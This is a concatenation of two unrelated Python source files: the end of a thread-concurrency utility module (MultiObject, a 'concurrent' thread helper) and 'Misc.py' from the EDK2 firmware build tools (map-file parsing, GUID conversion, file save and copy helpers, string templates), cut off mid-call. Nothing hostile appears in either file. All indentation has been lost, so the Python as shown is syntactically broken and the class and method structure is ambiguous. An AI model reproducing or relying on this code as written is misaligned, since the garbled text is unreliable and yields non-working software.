# some objects (Plumbum Cmd) are expensive to just get the attribute, so we require it
# on the base class
self._log_ctx = tuple(item._multiobject_log_ctx for item in self._items)
elif callable(log_ctx):
self._log_ctx = tuple(map(log_ctx, self._items))
elif log_ctx:
self._log_ctx = tuple(log_ctx)
elif issubclass(cstr, str):
self._log_ctx = tuple(dict(context="%s" % item) for item in self._items)
else:
self._log_ctx = tuple(dict(context="%s<M%03d>" % (cstr.__name__, i)) for i, item in enumerate(self._items))
if self._workers is None and hasattr(cstr, '_multiobject_workers'):
_workers = cstr._multiobject_workers
if _workers == -1:
self._workers = len(self._items) or None
else:
self._workers = _workers
def __repr__(self):
return "<%s (x%s/%s)>" % (self.__class__.__name__, len(self), self._workers)
@property
def L(self):
return list(self._items)
@property
def T(self):
return self._items
@property
def C(self):
from .collections import ListCollection
return ListCollection(self)
def __getattr__(self, attr):
if attr.startswith("_"):
raise AttributeError()
get = lambda obj: getattr(obj, attr)
ret = concurrent_map(get, self, log_contexts=self._log_ctx, workers=self._workers)
return self._new(ret)
def __call__(self, *args, **kwargs):
if not self:
return self._new(self)
for obj in self:
if not callable(obj):
raise Exception("%s is not callable" % obj)
def do_it(obj, **more_kwargs):
more_kwargs.update(kwargs)
return obj(*args, **more_kwargs)
if all(hasattr(obj, "__qualname__") for obj in self):
do_it = wraps(obj)(do_it)
else:
common_typ = concestor(*map(type, self))
do_it.__qualname__ = common_typ.__qualname__
initial_log_interval = kwargs.pop("initial_log_interval", None)
ret = concurrent_map(
do_it, self,
log_contexts=self._log_ctx,
workers=self._workers,
initial_log_interval=initial_log_interval)
return self._new(ret)
def __dir__(self):
return sorted(set.intersection(*(set(dir(obj)) for obj in self)).union(super().__dir__()))
trait_names = __dir__
def __iter__(self):
return iter(self._items)
def __len__(self):
return len(self._items)
# ================
def __getitem__(self, key):
return self.call(lambda i: i[key])
def _new(self, items=None, ctxs=None, workers=None, initial_log_interval=None):
return MultiObject(
self._items if items is None else items,
self._log_ctx if ctxs is None else ctxs,
self._workers if workers is None else workers,
self._initial_log_interval if initial_log_interval is None else initial_log_interval)
def with_workers(self, workers):
"Return a new ``MultiObject`` based on current items with the specified number of workers"
return self._new(workers=workers)
def call(self, func, *args, **kw):
"Concurrently call a function on each of the object contained by this ``MultiObject`` (as first param)"
initial_log_interval = kw.pop("initial_log_interval", self._initial_log_interval)
if kw:
func = wraps(func)(partial(func, **kw))
params = [((item,) + args) for item in self] if args else self
return self._new(concurrent_map(
func, params,
log_contexts=self._log_ctx,
workers=self._workers,
initial_log_interval=initial_log_interval), initial_log_interval=initial_log_interval)
each = call
def filter(self, pred):
if not pred:
pred = bool
filtering = self.call(pred)
filtered = [t for (*t, passed) in zip(self, self._log_ctx, filtering) if passed]
return self._new(*(zip(*filtered) if filtered else ((), ())))
def chain(self):
"Chain the iterables contained by this ``MultiObject``"
return MultiObject(chain(*self))
def zip_with(self, *collections):
mo = self._new(zip(self, *collections))
assert len(mo) == len(self), "All collection must have at least %s items" % len(self)
return mo
def enumerate(self, start=0):
"""
Replaces this pattern, which loses the log contexts::
MultiObject(enumerate(items)).call(lambda idx, item: ...)
with this pattern, which retains log contexts::
MultiObject(items).enumerate().call(lambda idx, item: ...)
"""
return self._new(zip(range(start, start + len(self)), self))
def zip(self):
"Concurrently iterate through the iterables contained by this ``MultiObject``"
iters = list(map(iter, self))
while True:
try:
ret = concurrent_map(next, iters, log_contexts=self._log_ctx, workers=self._workers)
except MultiException as me:
if me.common_type == StopIteration and me.complete:
break
raise
else:
yield self._new(ret)
def concurrent_find(self, func=lambda f: f(), **kw):
return concurrent_find(func, self, log_contexts=self._log_ctx, workers=self._workers, **kw)
def __enter__(self):
return self.call(lambda obj: obj.__enter__())
def __exit__(self, *args):
self.call(lambda obj: obj.__exit__(*args))
def concestor(*cls_list):
"Closest common ancestor class"
mros = [list(inspect.getmro(cls)) for cls in cls_list]
track = defaultdict(int)
while mros:
for mro in mros:
cur = mro.pop(0)
track[cur] += 1
if track[cur] == len(cls_list):
return cur
if len(mro) == 0:
mros.remove(mro)
return object # the base-class that rules the all
class concurrent(object):
"""
Higher-level thread execution.
:param func: The callable to invoke asynchronously.
:param throw: When used as a context-manager, if an exception was thrown inside the thread, re-raise it to the calling thread upon exiting the context. (default: True)
:param daemon: Set the thread as daemon, so it does not block the process from exiting if it did not complete. (default: True)
:param threadname: Set a name for this thread. (default: ``anon-<id>``)
:param loop: If ``True``, repeatedly calls ``func`` until the context is exited, ``.stop()`` is called, or the ``stopper`` event object is set. (default: False)
:param sleep: Used with the ``loop`` flag - the number of seconds between consecutive calls to ``func``. (default: 1)
:param stopper: Used with the ``loop`` flag - an external ``threading.Event`` object to use for stopping the loop .
:param console_logging: If ``False``, suppress logging to the console log handler. (default: False)
Running multiple tasks side-by-side::
with \
concurrent(requests.get, "api.myserver.com/data1") as async1, \
concurrent(requests.get, "api.myserver.com/data2") as async2:
my_data = open("local_data").read()
remote_data1 = async1.result()
remote_data2 = async2.result()
process_it(my_data, remote_data1, remote_data2)
Run something repeatedly in the background:
heartbeats = concurrent(send_heartbeat, loop=True, sleep=5)
heartbeats.start() # until stopped, or the process exits
with concurrent(print_status, loop=True, sleep=5):
some_long_task()
heartbeats.stop()
"""
def __init__(self, func, *args, **kwargs):
self.func = func
self.args = args
self.kwargs = kwargs
self.throw = kwargs.pop('throw', True)
self.daemon = kwargs.pop('daemon', True)
self.stopper = kwargs.pop('stopper', threading.Event())
self.sleep = kwargs.pop('sleep', 1)
self.loop = kwargs.pop('loop', False)
self.timer = None
self.console_logging = kwargs.pop('console_logging', True)
self.threadname = kwargs.pop('threadname', None)
if not self.threadname:
current_thread_name = threading.current_thread().name
if current_thread_name:
current_thread_name = current_thread_name.split('::')[0] # We want to see only the context
self.threadname = "%s::%X" % (current_thread_name, id(self))
else:
self.threadname = "anon-%X" % id(self)
real_thread_no_greenlet = kwargs.pop('real_thread_no_greenlet', False)
if IS_GEVENT:
# in case of using apply_gevent_patch function - use this option in order to defer some jobs to real threads
self.real_thread_no_greenlet = real_thread_no_greenlet
else:
# gevent isn't active, no need to do anything special
self.real_thread_no_greenlet = False
rimt = kwargs.pop("raise_in_main_thread", False)
if rimt:
exc_type = Exception if rimt is True else rimt
self.func = raise_in_main_thread(exc_type)(self.func)
def __repr__(self):
flags = ""
if self.daemon:
flags += 'D'
if self.loop:
flags += 'L'
if self.real_thread_no_greenlet:
flags += 'T'
return "<%s[%s] '%s'>" % (self.__class__.__name__, self.threadname, flags)
def _logged_func(self):
stack = ExitStack()
self.exc = None
self.timer = Timer()
stack.callback(self.timer.stop)
stack.callback(self.stop)
try:
if not self.console_logging:
stack.enter_context(_logger.suppressed())
_logger.debug("%s - starting", self)
while True:
self._result = self.func(*self.args, **self.kwargs)
if not self.loop:
return
if self.wait(self.sleep):
_logger.debug("%s - stopped", self)
return
except ProcessExiting as exc:
_logger.debug(exc)
raise
except KeyboardInterrupt as exc:
_logger.silent_exception("KeyboardInterrupt in thread running %s:", self.func)
self.exc = apply_timestamp(exc)
if IS_GEVENT:
raise # in gevent we should let this exception propagate to the main greenlet
except Exception as exc:
_logger.silent_exception("Exception in thread running %s: %s (traceback can be found in debug-level logs)", self.func, type(exc))
self.exc = apply_timestamp(exc)
finally:
stack.close()
def stop(self):
_logger.debug("%s - stopping", self)
self.stopper.set()
def wait(self, timeout=None):
if self.real_thread_no_greenlet:
# we can't '.wait' on this gevent event object, so instead we test it and sleep manually:
timer = Timer(expiration=timeout)
while not timer.expired:
if self.stopper.is_set():
return True
non_gevent_sleep(0.1)
return False
return self.stopper.wait(timeout)
def result(self, timeout=None):
self.wait(timeout=timeout)
if self.throw and self.exc:
raise self.exc
return self._result
def done(self):
"""
Return ``True`` if the thread is done (successfully or not)
"""
return hasattr(self, '_result') or getattr(self, 'exc', None) is not None
@contextmanager
def paused(self):
self.stop()
yield
self.start()
@contextmanager
def _running(self):
if DISABLE_CONCURRENCY:
self._logged_func()
yield self
return
if self.real_thread_no_greenlet and IS_GEVENT:
_logger.debug('sending job to a real OS thread')
self._join = defer_to_thread(func=self._logged_func, threadname=self.threadname)
else:
# threading.Thread could be a real thread or a gevent-patched thread...
self.thread = threading.Thread(target=self._logged_func, name=self.threadname, daemon=self.daemon)
_logger.debug('sending job to %s', self.thread)
self.stopper.clear()
self.thread.start()
self._join = self.thread.join
try:
yield self
finally:
self.stop() # if we loop, stop it
self._join()
if self.throw and self.exc:
raise self.exc
def __enter__(self):
self._ctx = self._running()
return self._ctx.__enter__()
def __exit__(self, *args):
return self._ctx.__exit__(*args)
def __iter__(self):
# TODO: document or remove
with self:
self.iterations = 0
while not self.wait(self.sleep):
yield self
self.iterations += 1
start = __enter__
def join(self):
self.__exit__(None, None, None)
__del__ = join
# re-exports
from .sync import break_locks, TerminationSignal, initialize_exception_listener, initialize_termination_listener, Timebomb
from .sync import set_timebomb, TagAlongThread, SYNC, LoggedRLock, RWLock, SoftLock, skip_if_locked, with_my_lock
from .sync import synchronized, SynchronizedSingleton, LoggedCondition, _check_exiting
import sys
if sys.version_info < (3, 7):
# async became reserved in 3.7, but we'll keep it for backwards compatibility
code = compile("async = asynchronous", __name__, "exec")
eval(code, globals(), globals())
|
Misc.py
|
## @file
# Common routines used by all tools
#
# Copyright (c) 2007 - 2019, Intel Corporation. All rights reserved.<BR>
# SPDX-License-Identifier: BSD-2-Clause-Patent
#
##
# Import Modules
#
from __future__ import absolute_import
import sys
import string
import threading
import time
import re
import pickle
import array
import shutil
import filecmp
from random import sample
from struct import pack
import uuid
import subprocess
import tempfile
from collections import OrderedDict
import Common.LongFilePathOs as os
from Common import EdkLogger as EdkLogger
from Common import GlobalData as GlobalData
from Common.DataType import *
from Common.BuildToolError import *
from CommonDataClass.DataClass import *
from Common.Parsing import GetSplitValueList
from Common.LongFilePathSupport import OpenLongFilePath as open
from Common.LongFilePathSupport import CopyLongFilePath as CopyLong
from Common.LongFilePathSupport import LongFilePath as LongFilePath
from Common.MultipleWorkspace import MultipleWorkspace as mws
from CommonDataClass.Exceptions import BadExpression
from Common.caching import cached_property
ArrayIndex = re.compile("\[\s*[0-9a-fA-FxX]*\s*\]")
## Regular expression used to find out place holders in string template
gPlaceholderPattern = re.compile("\$\{([^$()\s]+)\}", re.MULTILINE | re.UNICODE)
## regular expressions for map file processing
startPatternGeneral = re.compile("^Start[' ']+Length[' ']+Name[' ']+Class")
addressPatternGeneral = re.compile("^Address[' ']+Publics by Value[' ']+Rva\+Base")
valuePatternGcc = re.compile('^([\w_\.]+) +([\da-fA-Fx]+) +([\da-fA-Fx]+)$')
pcdPatternGcc = re.compile('^([\da-fA-Fx]+) +([\da-fA-Fx]+)')
secReGeneral = re.compile('^([\da-fA-F]+):([\da-fA-F]+) +([\da-fA-F]+)[Hh]? +([.\w\$]+) +(\w+)', re.UNICODE)
StructPattern = re.compile(r'[_a-zA-Z][0-9A-Za-z_]*$')
## Dictionary used to store dependencies of files
gDependencyDatabase = {} # arch : {file path : [dependent files list]}
#
# If a module is built more than once with different PCDs or library classes
# a temporary INF file with same content is created, the temporary file is removed
# when build exits.
#
_TempInfs = []
def GetVariableOffset(mapfilepath, efifilepath, varnames):
""" Parse map file to get variable offset in current EFI file
@param mapfilepath Map file absolution path
@param efifilepath: EFI binary file full path
@param varnames iteratable container whose elements are variable names to be searched
@return List whos elements are tuple with variable name and raw offset
"""
lines = []
try:
f = open(mapfilepath, 'r')
lines = f.readlines()
f.close()
except:
return None
if len(lines) == 0: return None
firstline = lines[0].strip()
if (firstline.startswith("Archive member included ") and
firstline.endswith(" file (symbol)")):
return _parseForGCC(lines, efifilepath, varnames)
if firstline.startswith("# Path:"):
return _parseForXcode(lines, efifilepath, varnames)
return _parseGeneral(lines, efifilepath, varnames)
def _parseForXcode(lines, efifilepath, varnames):
status = 0
ret = []
for line in lines:
line = line.strip()
if status == 0 and line == "# Symbols:":
status = 1
continue
if status == 1 and len(line) != 0:
for varname in varnames:
if varname in line:
# cannot pregenerate this RegEx since it uses varname from varnames.
m = re.match('^([\da-fA-FxX]+)([\s\S]*)([_]*%s)$' % varname, line)
if m is not None:
ret.append((varname, m.group(1)))
return ret
def _parseForGCC(lines, efifilepath, varnames):
""" Parse map file generated by GCC linker """
status = 0
sections = []
varoffset = []
for index, line in enumerate(lines):
line = line.strip()
# status machine transection
if status == 0 and line == "Memory Configuration":
status = 1
continue
elif status == 1 and line == 'Linker script and memory map':
status = 2
continue
elif status ==2 and line == 'START GROUP':
status = 3
continue
# status handler
if status == 3:
m = valuePatternGcc.match(line)
if m is not None:
sections.append(m.groups(0))
for varname in varnames:
Str = ''
m = re.match("^.data.(%s)" % varname, line)
if m is not None:
m = re.match(".data.(%s)$" % varname, line)
if m is not None:
Str = lines[index + 1]
else:
Str = line[len(".data.%s" % varname):]
if Str:
m = pcdPatternGcc.match(Str.strip())
if m is not None:
varoffset.append((varname, int(m.groups(0)[0], 16), int(sections[-1][1], 16), sections[-1][0]))
if not varoffset:
return []
# get section information from efi file
efisecs = PeImageClass(efifilepath).SectionHeaderList
if efisecs is None or len(efisecs) == 0:
return []
#redirection
redirection = 0
for efisec in efisecs:
for section in sections:
if section[0].strip() == efisec[0].strip() and section[0].strip() == '.text':
redirection = int(section[1], 16) - efisec[1]
ret = []
for var in varoffset:
for efisec in efisecs:
if var[1] >= efisec[1] and var[1] < efisec[1]+efisec[3]:
ret.append((var[0], hex(efisec[2] + var[1] - efisec[1] - redirection)))
return ret
def _parseGeneral(lines, efifilepath, varnames):
status = 0 #0 - beginning of file; 1 - PE section definition; 2 - symbol table
secs = [] # key = section name
varoffset = []
symRe = re.compile('^([\da-fA-F]+):([\da-fA-F]+) +([\.:\\\\\w\?@\$-]+) +([\da-fA-F]+)', re.UNICODE)
for line in lines:
line = line.strip()
if startPatternGeneral.match(line):
status = 1
continue
if addressPatternGeneral.match(line):
status = 2
continue
if line.startswith("entry point at"):
status = 3
continue
if status == 1 and len(line) != 0:
m = secReGeneral.match(line)
assert m is not None, "Fail to parse the section in map file , line is %s" % line
sec_no, sec_start, sec_length, sec_name, sec_class = m.groups(0)
secs.append([int(sec_no, 16), int(sec_start, 16), int(sec_length, 16), sec_name, sec_class])
if status == 2 and len(line) != 0:
for varname in varnames:
m = symRe.match(line)
assert m is not None, "Fail to parse the symbol in map file, line is %s" % line
sec_no, sym_offset, sym_name, vir_addr = m.groups(0)
sec_no = int(sec_no, 16)
sym_offset = int(sym_offset, 16)
vir_addr = int(vir_addr, 16)
# cannot pregenerate this RegEx since it uses varname from varnames.
m2 = re.match('^[_]*(%s)' % varname, sym_name)
if m2 is not None:
# fond a binary pcd entry in map file
for sec in secs:
if sec[0] == sec_no and (sym_offset >= sec[1] and sym_offset < sec[1] + sec[2]):
varoffset.append([varname, sec[3], sym_offset, vir_addr, sec_no])
if not varoffset: return []
# get section information from efi file
efisecs = PeImageClass(efifilepath).SectionHeaderList
if efisecs is None or len(efisecs) == 0:
return []
ret = []
for var in varoffset:
index = 0
for efisec in efisecs:
index = index + 1
if var[1].strip() == efisec[0].strip():
ret.append((var[0], hex(efisec[2] + var[2])))
elif var[4] == index:
ret.append((var[0], hex(efisec[2] + var[2])))
return ret
## Routine to process duplicated INF
#
# This function is called by following two cases:
# Case 1 in DSC:
# [components.arch]
# Pkg/module/module.inf
# Pkg/module/module.inf {
# <Defines>
# FILE_GUID = 0D1B936F-68F3-4589-AFCC-FB8B7AEBC836
# }
# Case 2 in FDF:
# INF Pkg/module/module.inf
# INF FILE_GUID = 0D1B936F-68F3-4589-AFCC-FB8B7AEBC836 Pkg/module/module.inf
#
# This function copies Pkg/module/module.inf to
# Conf/.cache/0D1B936F-68F3-4589-AFCC-FB8B7AEBC836module.inf
#
# @param Path Original PathClass object
# @param BaseName New file base name
#
# @retval return the new PathClass object
#
def ProcessDuplicatedInf(Path, BaseName, Workspace):
Filename = os.path.split(Path.File)[1]
if '.' in Filename:
Filename = BaseName + Path.BaseName + Filename[Filename.rfind('.'):]
else:
Filename = BaseName + Path.BaseName
DbDir = os.path.split(GlobalData.gDatabasePath)[0]
#
# A temporary INF is copied to database path which must have write permission
# The temporary will be removed at the end of build
# In case of name conflict, the file name is
# FILE_GUIDBaseName (0D1B936F-68F3-4589-AFCC-FB8B7AEBC836module.inf)
#
TempFullPath = os.path.join(DbDir,
Filename)
RtPath = PathClass(Path.File, Workspace)
#
# Modify the full path to temporary path, keep other unchanged
#
# To build same module more than once, the module path with FILE_GUID overridden has
# the file name FILE_GUIDmodule.inf, but the relative path (self.MetaFile.File) is the real path
# in DSC which is used as relative path by C files and other files in INF.
# A trick was used: all module paths are PathClass instances, after the initialization
# of PathClass, the PathClass.Path is overridden by the temporary INF path.
#
# The reason for creating a temporary INF is:
# Platform.Modules which is the base to create ModuleAutoGen objects is a dictionary,
# the key is the full path of INF, the value is an object to save overridden library instances, PCDs.
# A different key for the same module is needed to create different output directory,
# retrieve overridden PCDs, library instances.
#
# The BaseName is the FILE_GUID which is also the output directory name.
#
#
RtPath.Path = TempFullPath
RtPath.BaseName = BaseName
RtPath.OriginalPath = Path
#
# If file exists, compare contents
#
if os.path.exists(TempFullPath):
with open(str(Path), 'rb') as f1, open(TempFullPath, 'rb') as f2:
if f1.read() == f2.read():
return RtPath
_TempInfs.append(TempFullPath)
shutil.copy2(str(Path), TempFullPath)
return RtPath
## Remove temporary created INFs whose paths were saved in _TempInfs
#
def ClearDuplicatedInf():
while _TempInfs:
File = _TempInfs.pop()
if os.path.exists(File):
os.remove(File)
## Convert GUID string in xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx style to C structure style
#
# @param Guid The GUID string
#
# @retval string The GUID string in C structure style
#
def GuidStringToGuidStructureString(Guid):
GuidList = Guid.split('-')
Result = '{'
for Index in range(0, 3, 1):
Result = Result + '0x' + GuidList[Index] + ', '
Result = Result + '{0x' + GuidList[3][0:2] + ', 0x' + GuidList[3][2:4]
for Index in range(0, 12, 2):
Result = Result + ', 0x' + GuidList[4][Index:Index + 2]
Result += '}}'
return Result
## Convert GUID structure in byte array to xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
#
# @param GuidValue The GUID value in byte array
#
# @retval string The GUID value in xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx format
#
def GuidStructureByteArrayToGuidString(GuidValue):
guidValueString = GuidValue.lower().replace("{", "").replace("}", "").replace(" ", "").replace(";", "")
guidValueList = guidValueString.split(",")
if len(guidValueList) != 16:
return ''
#EdkLogger.error(None, None, "Invalid GUID value string %s" % GuidValue)
try:
return "%02x%02x%02x%02x-%02x%02x-%02x%02x-%02x%02x-%02x%02x%02x%02x%02x%02x" % (
int(guidValueList[3], 16),
int(guidValueList[2], 16),
int(guidValueList[1], 16),
int(guidValueList[0], 16),
int(guidValueList[5], 16),
int(guidValueList[4], 16),
int(guidValueList[7], 16),
int(guidValueList[6], 16),
int(guidValueList[8], 16),
int(guidValueList[9], 16),
int(guidValueList[10], 16),
int(guidValueList[11], 16),
int(guidValueList[12], 16),
int(guidValueList[13], 16),
int(guidValueList[14], 16),
int(guidValueList[15], 16)
)
except:
return ''
## Convert GUID string in C structure style to xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
#
# @param GuidValue The GUID value in C structure format
#
# @retval string The GUID value in xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx format
#
def GuidStructureStringToGuidString(GuidValue):
if not GlobalData.gGuidCFormatPattern.match(GuidValue):
return ''
guidValueString = GuidValue.lower().replace("{", "").replace("}", "").replace(" ", "").replace(";", "")
guidValueList = guidValueString.split(",")
if len(guidValueList) != 11:
return ''
#EdkLogger.error(None, None, "Invalid GUID value string %s" % GuidValue)
try:
return "%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x" % (
int(guidValueList[0], 16),
int(guidValueList[1], 16),
int(guidValueList[2], 16),
int(guidValueList[3], 16),
int(guidValueList[4], 16),
int(guidValueList[5], 16),
int(guidValueList[6], 16),
int(guidValueList[7], 16),
int(guidValueList[8], 16),
int(guidValueList[9], 16),
int(guidValueList[10], 16)
)
except:
return ''
## Convert GUID string in C structure style to xxxxxxxx_xxxx_xxxx_xxxx_xxxxxxxxxxxx
#
# @param GuidValue The GUID value in C structure format
#
# @retval string The GUID value in xxxxxxxx_xxxx_xxxx_xxxx_xxxxxxxxxxxx format
#
def GuidStructureStringToGuidValueName(GuidValue):
guidValueString = GuidValue.lower().replace("{", "").replace("}", "").replace(" ", "")
guidValueList = guidValueString.split(",")
if len(guidValueList) != 11:
EdkLogger.error(None, FORMAT_INVALID, "Invalid GUID value string [%s]" % GuidValue)
return "%08x_%04x_%04x_%02x%02x_%02x%02x%02x%02x%02x%02x" % (
int(guidValueList[0], 16),
int(guidValueList[1], 16),
int(guidValueList[2], 16),
int(guidValueList[3], 16),
int(guidValueList[4], 16),
int(guidValueList[5], 16),
int(guidValueList[6], 16),
int(guidValueList[7], 16),
int(guidValueList[8], 16),
int(guidValueList[9], 16),
int(guidValueList[10], 16)
)
## Create directories
#
# @param Directory The directory name
#
def CreateDirectory(Directory):
if Directory is None or Directory.strip() == "":
return True
try:
if not os.access(Directory, os.F_OK):
os.makedirs(Directory)
except:
return False
return True
## Remove directories, including files and sub-directories in it
#
# @param Directory The directory name
#
def RemoveDirectory(Directory, Recursively=False):
if Directory is None or Directory.strip() == "" or not os.path.exists(Directory):
return
if Recursively:
CurrentDirectory = os.getcwd()
os.chdir(Directory)
for File in os.listdir("."):
if os.path.isdir(File):
RemoveDirectory(File, Recursively)
else:
os.remove(File)
os.chdir(CurrentDirectory)
os.rmdir(Directory)
## Store content in file
#
# This method is used to save file only when its content is changed. This is
# quite useful for "make" system to decide what will be re-built and what won't.
#
# @param File The path of file
# @param Content The new content of the file
# @param IsBinaryFile The flag indicating if the file is binary file or not
#
# @retval True If the file content is changed and the file is renewed
# @retval False If the file content is the same
#
def SaveFileOnChange(File, Content, IsBinaryFile=True, FileLock=None):
# Convert to long file path format
File = LongFilePath(File)
if os.path.exists(File):
if IsBinaryFile:
try:
with open(File, "rb") as f:
if Content == f.read():
return False
except:
EdkLogger.error(None, FILE_OPEN_FAILURE, ExtraData=File)
else:
try:
with open(File, "r") as f:
if Content == f.read():
return False
except:
EdkLogger.error(None, FILE_OPEN_FAILURE, ExtraData=File)
DirName = os.path.dirname(File)
if not CreateDirectory(DirName):
EdkLogger.error(None, FILE_CREATE_FAILURE, "Could not create directory %s" % DirName)
else:
if DirName == '':
DirName = os.getcwd()
if not os.access(DirName, os.W_OK):
EdkLogger.error(None, PERMISSION_FAILURE, "Do not have write permission on directory %s" % DirName)
OpenMode = "w"
if IsBinaryFile:
OpenMode = "wb"
# use default file_lock if no input new lock
if not FileLock:
FileLock = GlobalData.file_lock
if FileLock:
FileLock.acquire()
if GlobalData.gIsWindows and not os.path.exists(File):
# write temp file, then rename the temp file to the real file
# to make sure the file be immediate saved to disk
with tempfile.NamedTemporaryFile(OpenMode, dir=os.path.dirname(File), delete=False) as tf:
tf.write(Content)
tempname = tf.name
try:
os.rename(tempname, File)
except IOError as X:
if GlobalData.gBinCacheSource:
EdkLogger.quiet("[cache error]:fails to save file with error: %s" % (X))
else:
EdkLogger.error(None, FILE_CREATE_FAILURE, ExtraData='IOError %s' % X)
finally:
if FileLock:
FileLock.release()
else:
try:
with open(File, OpenMode) as Fd:
Fd.write(Content)
except IOError as X:
if GlobalData.gBinCacheSource:
EdkLogger.quiet("[cache error]:fails to save file with error: %s" % (X))
else:
EdkLogger.error(None, FILE_CREATE_FAILURE, ExtraData='IOError %s' % X)
finally:
if FileLock:
FileLock.release()
return True
## Copy source file only if it is different from the destination file
#
# This method is used to copy file only if the source file and destination
# file content are different. This is quite useful to avoid duplicated
# file writing.
#
# @param SrcFile The path of source file
# @param Dst The path of destination file or folder
#
# @retval True The two files content are different and the file is copied
# @retval False No copy really happen
#
def CopyFileOnChange(SrcFile, Dst, FileLock=None):
# Convert to long file path format
SrcFile = LongFilePath(SrcFile)
Dst = LongFilePath(Dst)
if not os.path.exists(SrcFile):
return False
if os.path.isdir(Dst):
DstFile = os.path.join(Dst, os.path.basename(SrcFile))
else:
DstFile = Dst
if os.path.exists(DstFile) and filecmp.cmp(SrcFile, DstFile, shallow=False):
return False
DirName = os.path.dirname(DstFile)
if not CreateDirectory(DirName):
EdkLogger.error(None, FILE_CREATE_FAILURE, "Could not create directory %s" % DirName)
else:
if DirName == '':
DirName = os.getcwd()
if not os.access(DirName, os.W_OK):
EdkLogger.error(None, PERMISSION_FAILURE, "Do not have write permission on directory %s" % DirName)
# use default file_lock if no input new lock
if not FileLock:
FileLock = GlobalData.file_lock
if FileLock:
FileLock.acquire()
# os.replace and os.rename are the atomic operations in python 3 and 2.
# we use these two atomic operations to ensure the file copy is atomic:
# copy the src to a temp file in the dst same folder firstly, then
# replace or rename the temp file to the destination file.
with tempfile.NamedTemporaryFile(dir=DirName, delete=False) as tf:
CopyLong(SrcFile, tf.name)
tempname = tf.name
try:
if hasattr(os, 'replace'):
os.replace(tempname, DstFile)
else:
# os.rename reqire to remove the dst on Windows, otherwise OSError will be raised.
if GlobalData.gIsWindows and os.path.exists(DstFile):
os.remove(DstFile)
os.rename(tempname, DstFile)
except IOError as X:
if GlobalData.gBinCacheSource:
EdkLogger.quiet("[cache error]:fails to copy file with error: %s" % (X))
else:
EdkLogger.error(None, FILE_COPY_FAILURE, ExtraData='IOError %s' % X)
finally:
if FileLock:
FileLock.release()
return True
## Retrieve and cache the real path name in file system
#
# @param Root The root directory of path relative to
#
# @retval str The path string if the path exists
# @retval None If path doesn't exist
#
class DirCache:
_CACHE_ = set()
_UPPER_CACHE_ = {}
def __init__(self, Root):
self._Root = Root
for F in os.listdir(Root):
self._CACHE_.add(F)
self._UPPER_CACHE_[F.upper()] = F
# =[] operator
def __getitem__(self, Path):
Path = Path[len(os.path.commonprefix([Path, self._Root])):]
if not Path:
return self._Root
if Path and Path[0] == os.path.sep:
Path = Path[1:]
if Path in self._CACHE_:
return os.path.join(self._Root, Path)
UpperPath = Path.upper()
if UpperPath in self._UPPER_CACHE_:
return os.path.join(self._Root, self._UPPER_CACHE_[UpperPath])
IndexList = []
LastSepIndex = -1
SepIndex = Path.find(os.path.sep)
while SepIndex > -1:
Parent = UpperPath[:SepIndex]
if Parent not in self._UPPER_CACHE_:
break
LastSepIndex = SepIndex
SepIndex = Path.find(os.path.sep, LastSepIndex + 1)
if LastSepIndex == -1:
return None
Cwd = os.getcwd()
os.chdir(self._Root)
SepIndex = LastSepIndex
while SepIndex > -1:
Parent = Path[:SepIndex]
ParentKey = UpperPath[:SepIndex]
if ParentKey not in self._UPPER_CACHE_:
os.chdir(Cwd)
return None
if Parent in self._CACHE_:
ParentDir = Parent
else:
ParentDir = self._UPPER_CACHE_[ParentKey]
for F in os.listdir(ParentDir):
Dir = os.path.join(ParentDir, F)
self._CACHE_.add(Dir)
self._UPPER_CACHE_[Dir.upper()] = Dir
SepIndex = Path.find(os.path.sep, SepIndex + 1)
os.chdir(Cwd)
if Path in self._CACHE_:
return os.path.join(self._Root, Path)
elif UpperPath in self._UPPER_CACHE_:
return os.path.join(self._Root, self._UPPER_CACHE_[UpperPath])
return None
def RealPath(File, Dir='', OverrideDir=''):
NewFile = os.path.normpath(os.path.join(Dir, File))
NewFile = GlobalData.gAllFiles[NewFile]
if not NewFile and OverrideDir:
NewFile = os.path.normpath(os.path.join(OverrideDir, File))
NewFile = GlobalData.gAllFiles[NewFile]
return NewFile
## Get GUID value from given packages
#
# @param CName The CName of the GUID
# @param PackageList List of packages looking-up in
# @param Inffile The driver file
#
# @retval GuidValue if the CName is found in any given package
# @retval None if the CName is not found in all given packages
#
def GuidValue(CName, PackageList, Inffile = None):
for P in PackageList:
GuidKeys = list(P.Guids.keys())
if Inffile and P._PrivateGuids:
if not Inffile.startswith(P.MetaFile.Dir):
GuidKeys = [x for x in P.Guids if x not in P._PrivateGuids]
if CName in GuidKeys:
return P.Guids[CName]
return None
## A string template class
#
# This class implements a template for string replacement. A string template
# looks like following
#
# ${BEGIN} other_string ${placeholder_name} other_string ${END}
#
# The string between ${BEGIN} and ${END} will be repeated as many times as the
# length of "placeholder_name", which is a list passed through a dict. The
# "placeholder_name" is the key name of the dict. The ${BEGIN} and ${END} can
# be not used and, in this case, the "placeholder_name" must not a list and it
# will just be replaced once.
#
class TemplateString(object):
_REPEAT_START_FLAG = "BEGIN"
_REPEAT_END_FLAG = "END"
class Section(object):
_LIST_TYPES = [type([]), type(set()), type((0,))]
def __init__(self, TemplateSection, PlaceHolderList):
self._Template = TemplateSection
self._PlaceHolderList = []
# Split the section into sub-sections according to the position of placeholders
if PlaceHolderList:
self._SubSectionList = []
SubSectionStart = 0
#
# The placeholders passed in must be in the format of
#
# PlaceHolderName, PlaceHolderStartPoint, PlaceHolderEndPoint
#
for PlaceHolder, Start, End in PlaceHolderList:
self._SubSectionList.append(TemplateSection[SubSectionStart:Start])
self._SubSectionList.append(TemplateSection[Start:End])
self._PlaceHolderList.append(PlaceHolder)
SubSectionStart = End
if SubSectionStart < len(TemplateSection):
self._SubSectionList.append(TemplateSection[SubSectionStart:])
else:
self._SubSectionList = [TemplateSection]
def __str__(self):
return self._Template + " : " + str(self._PlaceHolderList)
def Instantiate(self, PlaceHolderValues):
RepeatTime = -1
RepeatPlaceHolders = {}
NonRepeatPlaceHolders = {}
for PlaceHolder in self._PlaceHolderList:
if PlaceHolder not in PlaceHolderValues:
continue
Value = PlaceHolderValues[PlaceHolder]
if type(Value) in self._LIST_TYPES:
if RepeatTime < 0:
RepeatTime = len(Value)
elif RepeatTime != len(Value):
EdkLogger.error(
